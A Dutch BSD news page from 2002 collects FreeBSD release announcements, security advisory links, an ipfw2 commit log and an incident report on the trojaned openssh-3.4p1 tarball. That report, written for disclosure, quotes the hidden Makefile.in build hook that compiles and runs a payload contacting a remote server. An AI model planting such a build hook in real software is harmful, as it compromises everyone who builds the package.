*BSD news from the past

Tot 1 september kunnen er nog toevoegingen gedaan worden voor de release van 4.7, die op rol staat voor 1 oktober.
De announcement:
[quote]Date: Mon, 12 Aug 2002 02:08:07 -0700
From: Murray Stokely
To: stable@freebsd.org
Cc: qa@FreeBSD.org, re@FreeBSD.org
Subject: HEADS UP: FreeBSD 4.7 Code Freeze in less than a month

It’s about that time already — FreeBSD 4.7 is just around the corner.
Now is the time to speak up about any problems with the new code that
has been introduced since 4.6. Please email the relevant
maintainers/committers for any specific bug fixes or enhancements that
you think should be MFCed for FreeBSD 4.7.

The code freeze date is firmly set, and barring any stability or
security problems, we intend to release on October 1.

Code Freeze:September 1, 2002
Release Candidate 1:September 15, 2002
Release Candidate 2:September 20, 2002
Release Candidate 3:September 25, 2002
Final release:October 1, 2002

For a more detailed schedule of the release process, please see
http://www.FreeBSD.org/releases/4.7R/schedule.html

Also, please remember to send all requests to re@FreeBSD.org. I will
be in Taiwan and Japan for parts of the code freeze, so replies to
messages addressed to me personally may be significantly delayed
during the month of September.

Thanks!

– Murray Stokely / Release Engineering Team [/quote]

FreeBSD 4.6.2 is gereleased, deze server draait nu ook 4.6.2
De volledige announcement:
[quote]I am happy to announce the availability of FreeBSD 4.6.2-RELEASE, a
maintenance release of the FreeBSD -STABLE development branch. Since
FreeBSD 4.6-RELEASE in June 2002, we have resolved several ATA-related
problems, updated the system OpenSSL and OpenSSH components, and
addressed several security issues.

For a list of new features and known problems, please see the release
notes and errata list, available here:

http://www.FreeBSD.org/releases/4.6.2R/relnotes.html
http://www.FreeBSD.org/releases/4.6.2R/errata.html

For more information about FreeBSD release engineering activities
(including information about the upcoming FreeBSD 4.7), please see:

http://www.FreeBSD.org/releng/

Availability
– ————

FreeBSD 4.6.2-RELEASE supports the i386 and alpha architectures and
can be installed directly over the net using the boot floppies or
copied to a local NFS/FTP server. Distributions for the i386 are
available now. As of this writing, the final builds for the alpha
architecture are in progress and will be made available shortly.

We can’t promise that all the mirror sites will carry the larger ISO
images, but they will at least be available from:

ftp://ftp.FreeBSD.org
ftp://ftp2.FreeBSD.org
ftp://ftp.dk.FreeBSD.org
ftp://ftp.ru.FreeBSD.org
ftp://ftp.tw.FreeBSD.org
ftp://ftp10.tw.FreeBSD.org

If you can’t afford FreeBSD on media, are impatient, or just want to
use it for evangelism purposes, then by all means download the ISO
images, otherwise please continue to support the FreeBSD Project by
purchasing media from one of our supporting vendors. The following
companies will be offering FreeBSD 4.6.2 based products:

FreeBSD Mall, Inc. http://www.freebsdmall.com/
FreeBSD Services Ltd. http://www.freebsd-services.com/

FreeBSD is also available via anonymous FTP from mirror sites in the
following countries: Argentina, Australia, Brazil, Bulgaria, Canada,
China, Czech Republic, Denmark, Estonia, Finland, France, Germany,
Hong Kong, Hungary, Iceland, Ireland, Israel, Japan, Korea, Lithuania,
the Netherlands, New Zealand, Poland, Portugal, Romania, Russia, Saudi
Arabia, South Africa, Slovak Republic, Slovenia, Spain, Sweden,
Taiwan, Thailand, Ukraine, and the United Kingdom.

Before trying the central FTP site, please check your regional
mirror(s) first by going to:

ftp://ftp..FreeBSD.org/pub/FreeBSD

Any additional mirror sites will be labeled ftp2, ftp3 and so on.

More information about FreeBSD mirror sites can be found at:

http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html

For instructions on installing FreeBSD, please see Chapter 2 of The
FreeBSD Handbook. It provides a complete installation walk-through for
users new to FreeBSD, and can be found online at:

http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/install.html

Acknowledgments
– —————

Many companies donated equipment, network access, or man-hours to
finance the release engineering activities for FreeBSD 4.6.2,
including Compaq, Yahoo!, Sentex Communications, NTT/Verio, and The
FreeBSD Mall.

In addition to myself, the release engineering team for 4.6.2-RELEASE
includes:

Bruce A. Mah Release Engineering, Documentation
Robert Watson Release Engineering, Security
John Baldwin Release Engineering
Brian Somers Release Engineering
Steve Price Package Building
Will Andrews Package Building
Kris Kennaway Package Building
Jacques A. Vidrine Security Officer

Enjoy![/quote]

G.O.B.I.E – Graphic OpenBSD Installation Engine

G.O.B.I.E. is een project dat het mogelijk moet maken om OpenBSD grafisch te kunnen instaleren. Dit project is gemaakt in de spirit van OpenBSD‚ dit betekent dat ze proberen de installatie zoveel mogelijk overeen te laten komen met de text install van OpenBSD.

G.O.B.I.E. wil graag waarde toevoegen aan het product door het maken van installatie modules voor bekende services zoals BIND‚ Sendmail en Apache.

Hier zijn een [url=http://www.gobie.net/screenshots.html]paar screenschots[/url] hoe G.O.B.I.E. eruit moet gaan zien.

Het blijft security patches regenen (net zoals buiten). Dit keer is het de beurt aan kqueu‚ nfs en ffs. Hiernaast is er een update van de security patch van openssl.
Hieronder de links naar de workarounds en de oplossingen:
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:37.kqueue.asc]kqueu[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:36.nfs.asc]nfs server[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:35.ffs.asc]ffs filesystem[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc]openssl[/url]

Na FreeBSD komt ook NetBSD met security patches op de proppen voor:
[url=ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-010.txt.asc]pppd[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-011.txt.asc]Sun RPC XDR decoder[/url]
[url=ftp://ftp.NetBSD.ORG/pub/NetBSD/security/advisories/NetBSD-SA2002-009.txt.asc]en OpenSSL[/url]

zo blijkt maar weer eens dat de verschillende BSD’s hun code delen.

Freebsd 4.6.1 zal waarschijnlijk ergens volgende week uitgebracht worden blijkt uit een e-mail van Murray Stokley‚ lid van het FreeBSD Release Engg. team. Het grootste obstakel voor 4.6.1 zijn de ATA problemen geweest‚ welke gerepareerd zijn door een paar programerings wijzigingen. De beveiligings medewerkers willen deze release 4.6.2 noemen‚ om de laatste onveiligheiden in FreeBSD kwesties en code fixes.

Het nieuwste FreeBSD schema voor toekomstige releases is te vinden op het [url=http://www.freebsd.org/releng/index.html#schedule]FreeBSD Engineering Info page. [/url]

Hier volgt het volledige artikel:

[quote]

**********************************************
From: Murray Stokely
To: vendors@FreeBSD.org
Cc: re@FreeBSD.org
Subject: 4.6.1

The ATA problems appears to be fixed with Soren’s most recent change.
This was the biggest holdup for 4.6.1. We also have a successfull
package build for the point release. However‚ in light of new
vulnerabilities‚ the security officers are going to merge in a few
more changes. The so@ would like to call the release 4.6.2 in light
of these new additions and the fact that the RELENG_4_6 branch has
been called 4.6.1 for over 10 days now.

Please email re@ and so@ if calling the release 4.6.2 ISO would
adversely affect your business (i.e.‚ you already have labels printed
that say 4.6.1?).

We are going to have to rebuild the packages with these new security
fixes‚ so we are again‚ at least half a week away from the release. ;(

– Murray

[/quote]

Edwin Groothuis is er achter gekomen dat op de ftp site van openbsd.org een vervuilde OpenSSH aanwezig was.
Deze vervuilde OpenSSH zorge voor een aanpassing het configure script zodat er een shell script gegenereerd wordt dat probeert verbinding te leggen
met een Australische server en zo mogelijk een DDOS aanval kan uitvoeren.
Het besmette bestand is inmiddels verwijderd.

De mail van Edwin Groothuis
[quote]Date: Thu‚ 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings‚

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)

The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin[/quote]

Na de melding van lek in stdio volgen er nog een aantal meer meldingen van security gaten.
De volgende programma’s hebben probleempje:
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:32.pppd.asc]FreeBSD-SA-02:32.pppd Topic: exploitable race condition in pppd[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc]FreeBSD-SA-02:33.openssl Topic: openssl contains multiple vulnerabilities[/url]
[url=ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:34.rpc.asc]FreeBSD-SA-02:34.rpc Topic: Sun RPC XDR decoder contains buffer overflow[/url]

Deze webserver is zijn uptime helaas ook weer kwijt.
Dus update je world voor de zekerheid.
Wil je automatisch op de hoogte gehouden worden van security meldingen‚ dan dien je een mailtje te sturen naar:
majordomo@FreeBSD.ORG met
subscribe freebsd-security-notifications jaap@aap.nl

in het bericht gedeelte

Het FreeBSD beveiligings team heeft een gereviseerd beveiligings advies gepost. Dit advies wijst op onveilig handelen van stdio file descriptors. Dit betreft alle releases van FreeBSD tot en met 4.6.
De orginele oplossing voor dit probleem loste niet alles op‚ daarom is er nieuwe patch beschikbaar.

Hierdoor hebben lokale gebruikers nog steeds de mogelijkheid tot superuser privileges.
Het is bekend dat ‘keyinit’ set-user-id program nog steeds uitvoerbaar is met deze methode. Er is een moegelijkheid dat er meerde programma’s uitvoerbaar zijn.

De Advisory:
[quote]

************************************
Date: Tue‚ 30 Jul 2002 11:21:05 -0700 (PDT)
From: FreeBSD Security Advisories
To: FreeBSD Security Advisories
Subject: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio [REVISED]

—–BEGIN PGP SIGNED MESSAGE—–

==================================================
===========================
FreeBSD-SA-02:23.stdio Security Advisory
The FreeBSD Project

Topic: insecure handling of stdio file descriptors

Category: core
Module: kernel
Announced: 2002-04-22
Credits: Joost Pol ‚
Georgi Guninski
Affects: All releases of FreeBSD up to and including 4.6-RELEASE
4.6-STABLE prior to the correction date
Corrected: 2002-07-30 15:40:46 UTC (RELENG_4)
2002-07-30 15:42:11 UTC (RELENG_4_6)
2002-07-30 15:42:46 UTC (RELENG_4_5)
2002-07-30 15:43:17 UTC (RELENG_4_4)
FreeBSD only: NO

0. Revision History

v1.0 2002-04-22 Initial release
v1.1 2002-04-23 Patch and revision numbers updated
v1.2 2002-07-29 procfs issue; updated patch

I. Background

By convention‚ POSIX systems associate file descriptors 0‚ 1‚ and 2
with standard input‚ standard output‚ and standard error‚
respectively. Almost all applications give these stdio file
descriptors special significance‚ such as writing error messages to
standard error (file descriptor 2).

In new processes‚ all file descriptors are duplicated from the parent
process. Unless these descriptors are marked close-on-exec‚ they
retain their state during an exec.

All POSIX systems assign file descriptors in sequential order‚
starting with the lowest unused file descriptor. For example‚ if a
newly exec’d process has file descriptors 0 and 1 open‚ but file
descriptor 2 closed‚ and then opens a file‚ the new file descriptor is
guaranteed to be 2 (standard error).

II. Problem Description

Some programs are set-user-id or set-group-id‚ and therefore run with
increased privileges. If such a program is started with some of the
stdio file descriptors closed‚ the program may open a file and
inadvertently associate it with standard input‚ standard output‚ or
standard error. The program may then read data from or write data to
the file inappropriately. If the file is one that the user would
normally not have privileges to open‚ this may result in an
opportunity for privilege escalation.

The original correction for this problem (corresponding to the first
revision of this advisory) contained an error. Systems using procfs
or linprocfs could still be exploited. The dates for the original‚
incomplete correction were:

Corrected: 2002-04-21 13:06:45 UTC (RELENG_4)
2002-04-21 13:08:57 UTC (RELENG_4_5)
2002-04-21 13:10:51 UTC (RELENG_4_4)

III. Impact

Local users may gain superuser privileges. It is known that the
`keyinit’ set-user-id program is exploitable using this method. There
may be other programs that are exploitable.

IV. Workaround

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

None. The set-user-id bit may be removed from `keyinit’ using the
following command‚ but note that there may be other programs that can
be exploited.

# chmod 0555 /usr/bin/keyinit

[FreeBSD versions 4.5-RELEASE-p4 or later‚ 4.4-RELEASE-p11 or later‚
4.6-RELEASE‚ and 4.6-STABLE]

Unmount all instances of the procfs and linprocfs filesystems using
the umount(8) command:

# umount -f -a -t procfs
# umount -f -a -t linprocfs

V. Solution

The kernel was modified to check file descriptors 0‚ 1‚ and 2 when
starting a set-user-ID or set-group-ID executable. If any of these
are not in use‚ they will be redirected to /dev/null.

1) Upgrade your vulnerable system to 4.6-STABLE; or to any of
the RELENG_4_6 (4.6.1-RELEASE-p1)‚ RELENG_4_5 (4.5-RELEASE-p10)‚ or
RELENG_4_4 (4.4-RELEASE-p17) security branches dated after the
respective correction dates.

2) To patch your present system:

a) Download the relevant patch from the location below‚ and verify the
detached PGP signature using your PGP utility.

[FreeBSD systems earlier than 4.5-RELEASE-p4 and 4.4-RELEASE-p11]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…tdio.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

[FreeBSD versions 4.5-RELEASE-p4 or later‚ 4.4-RELEASE-p11 or later‚
4.6-RELEASE‚ and 4.6-STABLE]

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C…dio2.patch.v1.2
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/C….patch.v1.2.asc

b) Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch c) Recompile your kernel as described in http://www.freebsd.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- sys/sys/filedesc.h RELENG_4 1.19.2.4 RELENG_4_6 1.19.2.4 RELENG_4_5 1.19.2.3.6.1 RELENG_4_4 1.19.2.3.4.1 sys/kern/kern_exec.c RELENG_4 1.107.2.15 RELENG_4_6 1.107.2.14.2.1 RELENG_4_5 1.107.2.13.2.2 RELENG_4_4 1.107.2.8.2.3 sys/kern/kern_descrip.c RELENG_4 1.81.2.12 RELENG_4_6 1.81.2.14 RELENG_4_5 1.81.2.9.2.2 RELENG_4_4 1.81.2.8.2.2 sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.6 RELENG_4_5 1.44.2.20.2.11 RELENG_4_4 1.44.2.17.2.16 - ------------------------------------------------------------------------- VII. References PINE-CERT-20020401
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.0.7 (FreeBSD)

iQCVAwUBPUbXw1UuHi5z0oilAQFgKQP/eOnmHorw/4NVEAEKTQp4+X7Px9p1wUGq
6OcLH5GuTbbwexd7KbCjbjzNZF7zgz1Qph2v7NQXb+W/ZaW2hEgcoURXkBomVxjl
61oXu72P35bmgNo7GQ794v/WDHd8FymtBv0kyY/vuZqg6l99tTuwi2ryV1ZszVrh
w21lAbhkyQo=
=YGVw
—–END PGP SIGNATURE—– [/quote]

De heer Luigi Rizzo heeft zijn nieuwe ipfw (firewall) code aan FreeBSD stable toegevoegt. Volgens zijn metingen is de nieuwe code 2 keer zo snel in verwerken van individuele firewall regels. Handig is dat de ruleset syntax backwards compatible is.

De volledige annoucement
[quote]
FYI….

(please read the commit log below before complaining).

cheers
luigi

—– Forwarded message from Luigi Rizzo —–

Date: Tue‚ 23 Jul 2002 20:21:24 -0700 (PDT)
From: Luigi Rizzo
Subject: cvs commit: src/sys/netinet ip_fw2.c ip_fw2.h src/sys/conf files
options src/sbin/ipfw Makefile ipfw2.c src/lib/libalias Makefile
alias_db.c
To: cvs-committers@FreeBSD.ORG‚ cvs-all@FreeBSD.ORG

luigi 2002/07/23 20:21:24 PDT

Modified files: (Branch: RELENG_4)
sys/conf options files
sbin/ipfw Makefile
lib/libalias Makefile alias_db.c
Added files: (Branch: RELENG_4)
sys/netinet ip_fw2.h ip_fw2.c
sbin/ipfw ipfw2.c
Log:
Bring ipfw2 into the -stable tree. This will give more people a
chance to test it‚ and hopefully accelerate the transition from the
old to the new ipfw code.

NOTE: THIS COMMIT WILL NOT CHANGE THE FIREWALL YOU USE‚
NOR A SINGLE BIT IN YOUR KERNEL AND BINARIES.
YOU WILL KEEP USING YOUR OLD “ipfw” UNLESS YOU:

+ add “options IPFW2” (undocumented) to your kernel config file;

+ compile and install sbin/ipfw and lib/libalias with
make -DIPFW2

in other words‚ you must really want it.

On the other hand‚ i believe you do really want to use this new
code. In addition to being twice as fast in processing individual
rules‚ you can use more powerful match patterns such as

… ip from 1.2.3.0/24{50‚6‚27‚158} to …
… ip from { 1.2.3.4/26 or 5.6.7.8/22 } to …
… ip from any 5-7‚9-66‚1020-3000‚4000-5000 to …

i.e. match sparse sets of IP addresses in constant time; use “or”
connectives between match patterns; have multiple port ranges; etc.
which I believe will dramatically reduce your ruleset size.

As an additional bonus‚ “keep-state” rules will now send keepalives
when the rule is about to expire‚ so you will not have your remote
login sessions die while you are idle.

The syntax is backward compatible with the old ipfw.
A manual page documenting the extensions has yet to be completed.

Revision Changes Path
1.13.2.5 +4 -1 src/lib/libalias/Makefile
1.21.2.14 +151 -36 src/lib/libalias/alias_db.c
1.6.6.3 +5 -1 src/sbin/ipfw/Makefile
1.4.2.1 +3166 -0 src/sbin/ipfw/ipfw2.c (new)
1.340.2.107 +1 -0 src/sys/conf/files
1.191.2.41 +1 -0 src/sys/conf/options
1.6.2.1 +2622 -0 src/sys/netinet/ip_fw2.c (new)
1.1.2.1 +404 -0 src/sys/netinet/ip_fw2.h (new)
[/quote]